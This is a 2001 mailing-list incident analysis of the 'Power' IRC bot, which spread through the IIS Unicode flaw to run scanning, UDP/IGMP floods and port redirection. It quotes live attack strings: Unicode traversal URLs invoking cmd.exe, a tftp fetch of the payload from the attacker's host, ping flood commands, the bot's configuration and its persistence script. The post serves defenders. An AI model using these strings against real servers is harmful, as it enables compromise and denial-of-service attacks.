"Power" bot (was Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool)

From: Dave Dittrich (dittrich@cac.washington.edu)
Date: 08/08/01

Date: Wed, 8 Aug 2001 12:41:55 -0700 (PDT)
From: Dave Dittrich <dittrich@cac.washington.edu>
To: Ryan Russell <ryan@securityfocus.com>
Subject: "Power" bot (was Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform  Denial of Service Attacks and Possible Attacking Tool)
Message-ID: <Pine.LNX.4.33.0108081141550.8353-100000@shiva0.cac.washington.edu>


> On Tue, 7 Aug 2001, Eyes to the Skies. wrote:
> > This looks like an attempt to use a CodeRed II infected system to
> > perform a denial of service attack. I don't think I need to stress the
> > severity of this.
> >
> > ==> /var/log/apache/access_log <==
> > [deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET
> > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted
> > target ip]+"-n"+7000+"-w"+0" 404 -
> Nothing to do with code red, or it would be root.exe, or
> /c/winnt/system32/cmd.exe.

I believe Ryan is correct that this is not CodeRed (or CodeRed II,
or Son-of-teenage-mutant-ninja-Red...) Rather, it looks to me
like this is the "Power" bot (CERT Advisory 2001-20 called it a worm,
though I don't believe it shows worm properties, when actually it just
combines distributed DoS, scanning, and port redirection in a single
tool that uses IRC for it control channel.) The CERT Advisory from
July 20 can be found at:


Below is an edited version of an analysis of "Power" bot. Best
(although hasty) efforts were made to sanitize it.

Reports of UDP "probes" from suspected CodeRed infected machines
may also be Power, but mis-categorized due to insufficient data.
Compare running processes and files on the system with information
in this report.

If you see evidence of this on your systems or networks, report this
to CERT and NIPC. (Please note differences in MD5 hashes of files
when reporting to help CERT/NIPC/whoever track variants and/or confirm
what is actually on the system. Seems like there are four of five
different malware programs floating around Windows NT/2000/IIS
systems, and more confusion than necessary about what is what. Details
*do* matter.)


[Note that output of the "ngrep" program is showing "2001/06/XX"
instead of "2001/07/XX", e.g.:

T 2001/06/03 18:07:28.124220 -> [AP]
  :XXXX!~XXXX@ PRIVMSG #XXXX :PASS: Password accepted;
   you are now registered with this service..

This may be a bug. No time has been spent trying to fix it, but
conversion of time stamps shown by "tcpdump" shows the log files have
the correct times.]

 Executive summary

The following is a report of distributed scanning, distributed denial
of service (DDoS), and distributed IRC port redirection, surrounding a
custom script add on to the mirc32.exe client for Windows. This activity
is associated with Windows 2000 and Windows NT systems, and is
currently relying on the Unicode vulnerability in Microsoft's IIS
server on these platforms.

Over 40 systems at one site were affected, and several were used
concurrently for denial of service attacks and distributed scanning
from July 2 through July 9. This site has received over 100 reports
during this period.

The distributed scanning is known to have attempted the IIS/Unicode
exploit on excess of 300,000 systems, and netted close to 10,000
vulnerable systems between July 6 and July 8, 2001. The attackers are
actively using this network for IRC "war" activity.

At this time, there is no known motive for more widespread attacks,
but the intruders are actively upgrading the software package in an
attempt to automate the addition of compromised hosts to the DDoS
network, which would result in a fully integrated scan/exploit/attack
network. (Limits in the ability to use IRC as a means of command and
control may limit the potential size of this network, but even with
the hosts they now control they are causing a significant amount of
network disruption and hundreds of abuse reports to those sites whose
systems are being used for scanning.)

 Time line and details

On July 1, 2001, XXXX reported detection of an attempted probe of his
web server:

[07/01/2001 00:04:43.602 GMT-0700] Connection:
[07/01/2001 00:04:43.922 GMT-0700] GET

This shows an attempted exploit of the Windows IIS Unicode vulnerability,
most recently made famous on May 8, 2001, in CERT Advisory 2001-11 as
a feature of the Linux sadmind-IIS worm:


At 15:05 on July 3, XXXXXX noticed abnormally high traffic rates on
the XXXXXXXXXXX/24 subnet:

Shortly after this, XXXXX analyzed the router's flow cache and noted
the following flows to/from the host XXXXXXXXXXXX (protocol 1 is

SrcIPaddress DstIPaddress Pr SrcP DstP Pkts B/Pk XXXXXXXXXXXX 01 0000 0000 5496 1500 XXXXXXXXXXXX 01 0000 0800 561 1500 XXXXXXXXXXXX 01 0000 0800 66 1500
XXXXXXXXXXXX 01 0000 0B01 33 56
XXXXXXXXXXXX 01 0000 0B01 2 56
XXXXXXXXXXXX 01 0000 0000 7245 1475 XXXXXXXXXXXX 01 0000 0000 39K1475 530.4 XXXXXXXXXXXX 01 0000 0800 893 1500 XXXXXXXXXXXX 01 0000 0000 30K1498 1323.3

XXXX noted that, as XXXXXX had observed, the attack appeared to have

XXXXX initiated network traffic monitoring to/from this system and noted
the following (output of "ngrep" program shown here):

  :blyeuhisdalg!~yxccqtdbciwy@XXXXXXXXX.213 JOIN :#XXXX..:tsorbmpybher!~
  voqteovzeijy@XXXXXXXXXXXXX JOIN :#XXXX..:ifwufklkxvrn!~tyyaxtpiybwh@XX
  XXXXXXXXXXX JOIN :#XXXX..:xcvzlgiwcyqw!~yjcefcwnoler@XXXXXXXXXXXX JOIN
   :#XXXX..:cehhaftlgppn!~skfutrulflcp@XXXXXXXXXXXXX JOIN :#XXXX..:stfet
  nzamgbm!~accjbzpgfcww@XXXXXXXXXXXX JOIN :#XXXX..:gwypgjbdbely!~actybok
  ttocq@XXXXXXXXXXXX JOIN :#XXXX..:zijlrondxqhb!~eoeelcwewsbs@XXXXXXXXXX
  XXX JOIN :#XXXX..:dyyyrpyannjh!~foyazmdppwyx@XXXXXXXXXXXXX JOIN :#XXXX
  ..:wmvcxcwsgypu!~fhkgogxuwcwa@XXXXXXXXXXXXXX JOIN :#XXXX..:rewgeayxjyv
  e!~wmqrpzihhrpp@XXXXXXXXXXXXXX JOIN :#XXXX..:kfukbsyoxacl!~qkpttdwhhba
  d@XXXXXXXXXXXXX JOIN :#XXXX..:jgmkjdbvlrpy!~sprbfnzguzwc@XXXXXXXXXXXXX
   JOIN :#XXXX..:swbbqdjyviql!~imufldgcgcbt@XXXXXXXXXXXX JOIN :#XXXX..

He followed this IRC traffic to other hosts and observed the

T 2001/06/03 18:07:28.124220 -> XXXXXXXXXXXXX:2334 [AP]
   you are now registered with this service..

T 2001/06/03 18:07:28.625205 -> XXXXXXXXXXXXX:2334 [AP]
  n port 111 [ /server XX.XXX.XXX.XX 111 ]..

Based on investigation, XXXXX was able to identify 9 hosts that
were likely compromised.

XXXXX had observed IRC traffic associated with these hosts. XXXXX
reported that the only IRC nick observed using XXXXXXXXXXXXXXXX
systems that isn't a random string of characters is "XXXXXXXXXXXXX",
and it looks like she and her bots hang out in the channel #XXXXX:


(enter all of his bots into #XXXX)

XXXXX observed the nick "XXXXXX" immediately grant operator privileges
to all of the bots, so it is assumed this is either also a bot, or
he/she is probably involved as well.

XXXXX made an nmap scan of the above listed suspect systems.
Common to many was a profile like the following, which shows Windows
2000 as the operating system, and at least two unusual listening

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/)
Interesting ports on XXXXXXXXXXXX (
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
100/tcp open newacct
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1026/tcp open nterm
4836/tcp open unknown
12624/tcp open unknown

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=17052 (Worthy challenge)
Remote operating system guess: Windows 2000 RC1 through final release

A connection to the 12624/tcp port elicits a "Password:" prompt.

(A capture of all network to/from several hosts was initiated on
July 3.)

On July 3, notice was sent to all the registered subnet contacts for
the known hosts, noting the suspected intrusions and the known
ports 100/tcp and 12624/tcp.

One administrator who received this message reported that he had
analyzed his system (a Win2k/IIS test system) using Foundstone's
"fport" program, found on this page:


It showed the following:

FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.

Pid Process Port Proto Path
884 inetinfo -> 21 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
884 inetinfo -> 25 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
884 inetinfo -> 80 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
1400 winnt -> 100 TCP C:\winnt.exe
444 svchost -> 135 TCP C:\WINNT\system32\svchost.exe
884 inetinfo -> 443 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
8 System -> 445 TCP
736 MSTask -> 1044 TCP C:\WINNT\system32\MSTask.exe
884 inetinfo -> 1052 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
660 sqlservr -> 1056 TCP C:\MSSQL7\binn\sqlservr.exe
8 System -> 1067 TCP
660 sqlservr -> 1433 TCP C:\MSSQL7\binn\sqlservr.exe
1400 winnt -> 2350 TCP C:\winnt.exe
1400 winnt -> 2351 TCP C:\winnt.exe
1400 winnt -> 2352 TCP C:\winnt.exe
1400 winnt -> 2353 TCP C:\winnt.exe
 [hundreds of lines removed . . .]
1400 winnt -> 2646 TCP C:\winnt.exe
1400 winnt -> 2647 TCP C:\winnt.exe
1400 winnt -> 2648 TCP C:\winnt.exe
772 termsrv -> 3389 TCP C:\WINNT\System32\termsrv.exe
884 inetinfo -> 4700 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
1152 nt -> 4836 TCP c:\inetpub\scripts\nt.exe
1152 nt -> 12624 TCP c:\inetpub\scripts\nt.exe
444 svchost -> 135 UDP C:\WINNT\system32\svchost.exe
8 System -> 445 UDP
260 lsass -> 1027 UDP C:\WINNT\system32\lsass.exe
220 winlogon -> 1046 UDP \??\C:\WINNT\system32\winlogon.exe
248 services -> 1051 UDP C:\WINNT\system32\services.exe
884 inetinfo -> 1064 UDP C:\WINNT\System32\inetsrv\inetinfo.exe
564 llssrv -> 1087 UDP C:\WINNT\System32\llssrv.exe
464 spoolsv -> 1217 UDP C:\WINNT\system32\spoolsv.exe
884 inetinfo -> 3456 UDP C:\WINNT\System32\inetsrv\inetinfo.exe
1152 nt -> 12623 UDP c:\inetpub\scripts\nt.exe

Listening on 100/tcp and 12624/tcp is the same program,
"c:\inetpub\scripts\nt.exe". (It is unclear what the 300 ports listed
for "C:\winnt.exe" are all about.)

On July 5, XXXX notes more IRC traffic that has been logged, showing
the network for bots being used to initiate DDoS attacks:

T 2001/06/05 09:46:03.354884 -> [AP]

T 2001/06/05 09:56:40.777333 -> [AP]

T 2001/06/05 10:26:32.567410 -> [AP]
  :XXXX!~XXXXXX@ QUIT :upset/depressed/pissed off/hu

T 2001/06/05 10:26:32.561551 -> [AP]
  :XXXX!~XXXXXX@ QUIT :upset/depressed/pissed off/hu

T 2001/06/05 10:40:45.555193 -> [AP]

T 2001/06/05 09:19:36.061139 -> [AP]

T 2001/06/05 09:29:30.138876 -> [AP]

The victim of this attack is:

    Internet address =

SplitRock Services, Inc (NETBLK-SPLITROCK98)
   8665 New Trails Drive
   The Woodlands, TX 77381

   Netname: SPLITROCK98
   Netblock: -
   Maintainer: SPLT

      Splitrock Services, Inc (IS1-ARIN) netadmin@SPLITROCK.NET

(See also files "remote.ini" and "mirc.ini")

On July 6, two incident handlers examined a suspect Windows 2000 system.

Using Foundstone's "afind" and "fport" forensic tools for Windows
it was confirmed that "nt.exe" was installed on this system
July 1 19:39 PDT. (It was found that C:\winnt.exe could not be zipped
directly, but could be copied to D:\ where it was then possible to zip
it into an archive.)

The following files were found and retrieved for analysis and reverse
engineering (MD5 hashes shown for comparison):

00b41a87e536de8908af134692ceadf6 hexplore.exe
00f8ba83759e9257603d4203b0561715 mirc.ini
87f4355b0a59a7e87250ff4925dc75b8 nt.exe
6d3ee930a216483ea2dd5860ea7d44f0 nt.INI
748cbd596f1956858f27f88731000644 remote.ini
7644ae3bcadae89e7160e3aff2e7d2bc root.exe
5cbbd44be7359be787765abf7c90644b winnt.exe
0a1295be3a0fb615e7dfb88b9a3abb20 win98.ava
dc5a3f43491d8309f1742acec7668698 wins.ava

These files were located in the C:\Inetpub\scripts, C:\, and C:\i386
directories. (The same system showed an earlier exploitation by the
sadmind-IIS worm, which left the files default.asp, default.htm,
index.asp, and index.htm. Also found was root.exe, which may have
been from yet another prior compromise.)

 Volume in drive C has no label.
  Volume Serial Number is 401B-321D

   Directory of c:\Inetpub\scripts

   07/01/01 19:31 <DIR> .
   07/01/01 19:31 <DIR> ..
   06/13/01 09:19 289 default.asp
   06/13/01 09:19 289 default.htm
   06/13/01 09:19 289 index.asp
   06/13/01 09:19 289 index.htm
   07/01/01 19:30 161,280 nt.exe
   07/01/01 19:31 23 nt.INI
   11/18/99 12:04 208,144 root.exe
                  9 File(s) 370,603 bytes
                                               37,631,488 bytes free

It is not clear what role the nt.INI file plays, but the contents are
shown here (two versions from two different sources are shown):

% xxd nt.INI
0000000: bdb0 a8b3 baad 0d0a cfdc c0d2 decb cb0d ................
0000010: 0a0d 0a0d 0a0d 0a .......

% xxd ../nt.INI
0000000: bdb0 a8b3 baad 0d0a dad1 cbd6 decb 0d0a ................
0000010: 0d0a 0d0a 0d0a ......

The program appears to work in this way:

  1). The attacker exploits the Unicode vulnerability in Microsoft IIS
       to run a command. This command uses the trivial file transfer
       protocol to upload a file from the attacking host:

2001-07-02 21:39:14 - 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+tftp.exe+"-i"+ 502 -

       (It is assumed the same method is used to then run the program,
       although this has not been confirmed from system logs. The
       above is all that was provided.)

  2). The "nt.exe" program appears to be compressed. When run, it is
      assumed it uncompresses itself, creates(?) a file nt.INI (role
      not determined yet) and configures the system to restart
      itself at each reboot. It listens on port 12624 for commands
      to upload files. (It is not yet clear precisely how this upload
      protocol works, but it has been observed to upload files on
      port 4836/tcp as shown below.)

  3). After nt.exe is set up, a series of programs are loaded,

        winnt.exe Renamed(?) mirc32.exe binary
        mirc.ini mirc32 config file
              hexplore.exe Rootkit style process hider?
        remote.ini Configuration file for bot
        wins.ava Code for BNC/Scan/DDoS program
        win98.ava Code for BNC/Scan/DDoS program

      These files have been found in C:\Inetpub\scripts, C:\, and/or

   4). Periodically, new updates of the program are uploaded from
       other sites. (This program appears to be in active
       development by XXXXX and XXXXXXX.)

The following is the (edited) contents of "remote.ini", a list of
variables for the bot, which shows these nicks and other specifics of
the bot:

n1=%scan.ip 24.189.31.*
n2=%scan.port 27374
n3=%scan.inc 191
n4=%r 858921703669
n6=%auto #XXXX
n7=%masterpass 12345
n8=%key password
n9=%pass power
n10=%mass.server dysfunction-1.mine.nu
n11=%mass.port 6667
n12=%mass.bots 5
n13=%mass.inc 5
n14=%user qmlhzqztcjqh
n16=%split.port 6667
n17=%split.chans #XXXX,#XXXXXX,#XXXX
n18=%bnc power
n19=%udp.times 99999
n20=%udp.chan #XXXX
n22=%dos.times 50
n23=%bup 15
n24=%bnc.port 100
n25=%bnc.status On
n26=%scan.p 27374
n27=%sscan On
n28=%scan.info SubSeven Protection: http://come.to/sub7-protection/
n29=%found.upload server removed. closing...
n30=%progress 8
n31=%uploading found
n32=%localfile c:\windows\winserver.exe
n33=%remotefile c:\windows\winserver.exe
n34=%upload.tot 382371
n35=%channel #XXXX
n36=%prefix 24

Commands supported by the server version analyzed on July 7, 2001.
Command options are shown in lower case, with user specific variable
arguments shown in ALL CAPS (see "wins.ava" for source to these

                Show info about system running bot, for example:

PRIVMSG #XXXX :[Windows 2000][1wk 3days 6hrs 25mins 12secs][][Powe
:Power[9738712607]!~Power@ PRIVMSG #XXXX :[Windows NT][2wks 6days
22hrs 6mins 3secs][][Power1.0]
:Power[2558484581]!~Power@ PRIVMSG #XXXX :[Windows 2000][2wks 1day
15hrs 52mins 4secs][][Power1.0]
:Power[6813557052]!~Power@ PRIVMSG #XXXX :[Windows 2000][1wk 2days
 8hrs 44mins 53secs][][Power1.0]
:Power[2916020276]!~Power@ PRIVMSG #XXXX :[Windows NT][1wk 6days 1
5hrs 27mins 33secs][][Power1.0]
:Power[4053275324]!~Power@ PRIVMSG #XXXX :[Windows 2000][1wk 2days
 8hrs 44mins 1sec][][Power1.0]
:Power[4205594385]!~Power@ PRIVMSG #XXXX :[Windows 2000][2wks 6day
s 2hrs 15mins 51secs][][Power1.0]
 . . .

        !add NICK
                Allows access to specified nick

        !remove NICK
                Removes access to specified nick


        !pass PASSWORD
                Sets new password

        !login PASSWORD
                Logs user in, if the password is correct (this password
                is in clear text.)

        !massbots SERVER PORT BOTS
                (Not sure how this works, but probably tells bots which
                IRC server to use; not sure what the # at end is for yet.)

        !rbots #CHAN
                Register(?) bots in channel "#CHAN".

                Closes socket for "*Power*" (kills bots?)

        !udp IP TIMES
                Floods victim ip address "IP" with large UDP packets

        !hudp IP
        !hudp all
                Halt UDP flood on specific IP, or all hosts being flooded

                Prints list of ips being flooded.

        !dos IP TIMES
                This command exploits a feature of Microsoft
                Windows 2000 ping.exe, which allows one to set the
                protocol type to IGMP or IGRP for packets sent, using
                the following flags:

              ping -v igrp -t -l 5000 %dos.ip -n %dos.times -w 0
              ping -v igmp -t -l 5000 %dos.ip -n %dos.times -w 0

        !bnc on
                Enable BNC port redirection on preset port (100 is being
                used currently on those bots observed.)

        !bnc off
                Disable BNC port redirection.

        !bnc port PORT
                Set port for BNC to listen on to "PORT".

        !bnc pass BNC

        !bnc reset
                Closes and reopens socket.

        !bnc status
                Report status of BNC and explain how to connect to it.

        !scan status
                Report status of scanning (IP and port.)

        !scan off
                Stop scanning.

        !scan prefix PREFIX
                Start scanning IP netblock with prefix PREFIX on predefined

        !scan on
                Start scanning on IP netblock defined by the first octet
                the predefined prefix, the second octet randomized from
                0..220, the third octet randomized from 0..255,
                and the forth octet being anything. The port to be scanned
                is assumed to have been set earlier. Lastly, it reports
                scanning status.

        !scan port PORT
                Sets the port to be scanned and reports status.

        !raw command [args...]
                (Not quite sure how this works.)

                (Unknown how this works)

        !host list
                If user's nick is in a special access list, list the number
                of lines in the file "webservers.txt" (must be a list
                of bots).

        !host send
                Sends a copy of "webservers.txt" via DCC.

        !packet IP PACKETS
                Flood address IP with PACKETS packets from each of a
                set of web servers listed in a file "webservers.txt".
                These are Windows IIS servers with the Unicode
                vulnerability. It sends each one a web request:

        GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c ping.exe -v igmp
        -t -l 30000 IP -n PACKETS -w 10

                Reports "Packeting IP with # Packets and N hosts" (where
                "N" is the number of lines in "webservers.txt")

                Reports "Sockets Opened During Last Packet: N" where
                N is a variable %sockets.

        !rbots COMMAND
                Not sure what this is, but here it is in use:

T 2001/06/06 02:37:25.209849 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG #XXXX :!rbots privmsg
    dos[12] :this annoying!..
    . . .
T 2001/06/06 02:38:02.828723 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG #XXXX :!rbots notice
  dos[12] :this annoying!..

Examples of commands:

T 2001/06/06 00:38:22.697747 -> [AP]

T 2001/06/06 00:38:23.106934 -> [AP]
  :Power[2558484581]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.1
  98.75.194][Times: 99999][Halt: !hudp]..:Power[973871260
  7]!~Power@ PRIVMSG #XXXX :[UDP][IP:][Time
  s: 99999][Halt: !hudp]..:Power[8935450546]!~Power@217.3
  4.104.98 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Halt:
   !hudp]..:Power[9201287277]!~Power@ PRIVMS
  G #XXXX :[UDP][IP:][Times: 99999][Halt: !hudp 216.198.
  75.194]..:Power[8536771384]!~Power@ PRIVMSG #XXXX :[UDP]
  [IP:][Times: 99999][Halt: !hudp]..:Power
  [6035234664]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.198.75
  .194][Times: 99999][Halt: !hudp]..:Power[2916020276]!~P
  ower@ PRIVMSG #XXXX :[UDP][IP:][Times: 99
  999][Halt: !hudp]..:Power[2905936848]!~Power@192.168.14
  .12 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Halt: !hud
  999][Halt: !hudp]..:Power[2905936848]!~Power@192.168.14
  .12 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Halt: !hud
  p]..:Power[5499856258]!~Power@ PRIVMSG #po
  wer :[UDP][IP:][Times: 99999][Halt: !hudp
  4]..:Power[4053275324]!~Power@ PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Halt: !hudp]..:Power[6731
  664986]!~Power@ PRIVMSG #XXXX :[UDP][IP:]
  [Times: 99999][Halt: !hudp]..:Power[3834129955]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.19..............

T 2001/06/06 00:38:23.106934 -> [AP]
  s: 99999][Halt: !hudp]..

T 2001/06/06 00:38:23.490730 -> [AP]
  :Power[2236262189]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.
  198.75.194][Times: 99999][Halt: !hudp]..:Power[87055102
  95]!~Power@ PRIVMSG #XXXX :[UDP][IP:][Tim
  es: 99999][Halt: !hudp]..:Power[6941998911]!~Power@217.
  34.194.193 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Hal
  es: 99999][Halt: !hudp]..:Power[6941998911]!~Power@217.
  34.194.193 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Hal
  t: !hudp]..:Power[9080084936]!~Power@ PRIV
  MSG #XXXX :[UDP][IP:][Times: 99999][Halt: !hudp 216.19

T 2001/06/06 00:38:29.706665 -> [AP]
  :Power[3408730344]!~Power@ PRIVMSG #XXXX :All UDP Halted.

T 2001/06/06 00:38:30.278941 -> [AP]
  :Power[3408730344]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.1
  98.75.194][Times: 99999][Halt: !hudp]..

T 2001/06/06 00:38:19.943790 -> [AP]

T 2001/06/06 00:38:20.328563 -> [AP]
  :Power[9738712607]!~Power@ PRIVMSG #XXXX :All UDP Halted
  ..:Power[2558484581]!~Power@ PRIVMSG #XXXX :All UDP Halte
  d..:Power[8935450546]!~Power@ PRIVMSG #XXXX :All UDP Hal
  ted..:Power[2916020276]!~Power@ PRIVMSG #XXXX :All UDP H

T 2001/06/06 00:38:20.869588 -> [AP]
  :Power[3834129955]!~Power@ PRIVMSG #XXXX :All UDP Halted
  ..:Power[6035234664]!~Power@ PRIVMSG #XXXX :All UDP Halt
  ed..:Power[2905936848]!~Power@ PRIVMSG #XXXX :All UDP Ha
  lted..:Power[5499856258]!~Power@ PRIVMSG #XXXX :All UDP
  Halted..:Power[6731664986]!~Power@ PRIVMSG #XXXX :All UD
  P Halted..:Power[4053275324]!~Power@ PRIVMSG #XXXX :All
  UDP Halted..:Power[9201287277]!~Power@ PRIVMSG #XXXX :Al
  l UDP Halted..:Power[8536771384]!~Power@ PRIVMSG #XXXX :
  UDP Halted..:Power[9201287277]!~Power@ PRIVMSG #XXXX :Al
  l UDP Halted..:Power[8536771384]!~Power@ PRIVMSG #XXXX :
  All UDP Halted..:Power[8705510295]!~Power@ PRIVMSG #XXXX
   :All UDP Halted..:Power[9080084936]!~Power@ PRIVMSG #pow
  er :All UDP Halted..:Power[6941998911]!~Power@ PRIVMSG #
  power :All UDP Halted..

T 2001/06/06 00:38:21.840309 -> [AP]
  :Power[2236262189]!~Power@ PRIVMSG #XXXX :All UDP Halted

T 2001/06/06 00:58:49.455709 -> [AP]

T 2001/06/06 00:58:49.660791 -> [AP]
  :Scanner[208]!~Power@ PRIVMSG #XXXXXX :[Windows 2000][1wk 3d
  ays 7hrs 7mins 12secs][][Power1.0]..

T 2001/06/06 00:58:49.944976 -> [AP]
  :Scanner[24]!~Power@ PRIVMSG #XXXXXX :[Windows 2000][2wks 6d
  ays 2hrs 57mins 52secs][][Power1.0]..

Request for webservers.txt (list of vulnerable IIS servers)

T 2001/06/06 05:09:13.401016 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG Scanner[65] :!raw dcc s
  end XXXXXXX webservers.txt..

T 2001/06/06 05:09:13.533831 -> [AP]
  NOTICE XXXXXXX :DCC Send webservers.txt (

T 2001/06/06 05:09:14.051419 -> [AP]
  NOTICE XXXXXXX :DCC Send webservers.txt (

T 2001/06/06 05:09:14.141264 -> [AP]
  PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728921 4989 28971..

T 2001/06/06 05:09:14.562170 -> [AP]
  PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728981 3843 32793..

T 2001/06/06 05:09:18.843498 -> [AP]
  ME file.ext 4989 2130...

T 2001/06/06 05:09:18.844475 -> [AP]
  PRIVMSG XXXXXXX :.DCC ACCEPT file.ext 4989 2130..

T 2001/06/06 05:09:24.155118 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG Scanner[65] :!raw dcc s
  end XXXXXXX webservers.txt..

T 2001/06/06 05:09:24.155118 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG Scanner[208] :!raw dcc
  send XXXXXXX webservers.txt..

T 2001/06/06 05:09:24.170743 -> [AP]
  NOTICE XXXXXXX :DCC Send webservers.txt (

T 2001/06/06 05:09:24.251799 -> [AP]
  NOTICE XXXXXXX :DCC Send webservers.txt (

T 2001/06/06 05:09:24.730324 -> [AP]
  PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728921 3407 29000..

T 2001/06/06 05:09:24.839701 -> [AP]
  PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728981 2523 32793..


> - - [06/Jul/2001:06:44:08 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"

> > Jul-06 05:30:26
> > GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

[Fri Jul 6 03:08:15 2001] [error] [client] File does not exist:
/usr/sites/ben/htdocs/default/scripts/..^../winnt/system32/cmd.exe - - [06/Jul/2001:03:08:15 -0600] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
[Fri Jul 6 03:08:15 2001] [error] [client] File does not exist:

Hosts reported scanning off site:

On July 7, the following report was received:

    Date: Sat, 07 Jul 2001 18:29:45 -0400
    Subject: Re: [1775] Re: hack attempt from
    From: XXXXXX
    To: abuse@site

    Thank you for the prompt follow-up to my message. In response to the
    additional information you requested, the clock on my server is set to
    the eastern daylight time, and is calibrated with Apple's time server.
    This means the attack occurred at 3.45 am your time, on July 6th.

    Here is the web log excerpt once again (same as in the first message): - - [06/JUL/2001:06:45:33 -0400] "GET
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 186

The bot on this system has been actively scanning for quite some time, and
this status message occurs prior to the report by XXXXXX.

T 2001/06/06 03:44:18.685984 -> [AP]

T 2001/06/06 03:44:19.273885 -> [AP]
  :Scanner[208]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 1279]..:Scanner[24]!~Power@
  0 PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 16

At this point, it is up to 2934 vulnerable systems.

At 00:15:31 on July 6, someone on the host uploads a set
of new programs to the host

T 2001/06/06 00:38:34.043659 -> [AP]

T 2001/06/06 00:38:35.567124 -> [AP]

T 2001/06/06 00:38:38.827927 -> [AP]

T 2001/06/06 00:38:48.360328 -> [AP]

T 2001/06/06 00:38:48.538066 -> [A]
  alias connect { .server dysfunction-1.mine.nu 6667 }..on 1:start:{..
  run hexplore.exe /hide mIRC*..writeini c:\winnt\win.ini windows run $m
  ircexe...timerwriteini 0 30 writeini c:\winnt\win.ini windows run $mir
  cexe.. nick Scanner[208].. .server dysfunction-1.mine.nu 6667.. .ti
  merconnect 0 30 connect..write -c webservers.txt..if (%scanning != don
  e) { .http | halt }..}..on 1:connect:{.. timerconnect off..
    join #XXXXXX %key..}..on 1:disconnect:{.. server dysfunction-1.mine.nu
   6667.. .timerconnect 0 30 connect..}..on 1:t
. . .

This shows the uploading of files found on other systems, in this case
"wins.ava". The word "password" is also seen as the key value in the
"remote.ini" file shown earlier. The file upload protocol thus uses
12684/tcp to initiate the transfer, followed by the file contents
being sent on 4836/tcp.

Around midnight on the morning of July 6, XXXXX is talking with
XXXXXXX about their scanning efforts. XXXXX makes an estimate of how
long the scanning will take:

T 2001/06/06 00:13:41.244701 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXX :and it will take them
  24 hours to scan the whole ip range..

A few minutes later, XXXXX checks the status and sees they have
detected "almost 1000" vulnerable Windows IIS servers.

T 2001/06/06 00:58:54.622797 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :!scan status..

T 2001/06/06 00:58:54.821043 -> [AP]
  :Scanner[24]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 2][Port: 80][Found: 319]..

T 2001/06/06 00:58:55.156010 -> [AP]
  :Scanner[208]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 320]..

T 2001/06/06 00:59:03.677652 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :almost 1000..

T 2001/06/06 00:59:09.126971 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :and we aren't even close.

T 2001/06/06 00:59:15.598770 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :we are gonna own more tha
  n we though..

T 2001/06/06 00:59:19.374231 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :i bet 100thousand..

T 2001/06/06 01:00:21.989645 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :!scan status..

T 2001/06/06 01:00:22.580477 -> [AP]
  :Scanner[208]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 323]..:Scanner[24]!~Power@ P
  RIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 336].

Four hours later he checks again and the number is now over 5000...

T 2001/06/06 05:53:48.655820 -> [AP]
  :Scanner[24]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 2][Port: 80][Found: 2794]..:Scanner[208]!~Power@
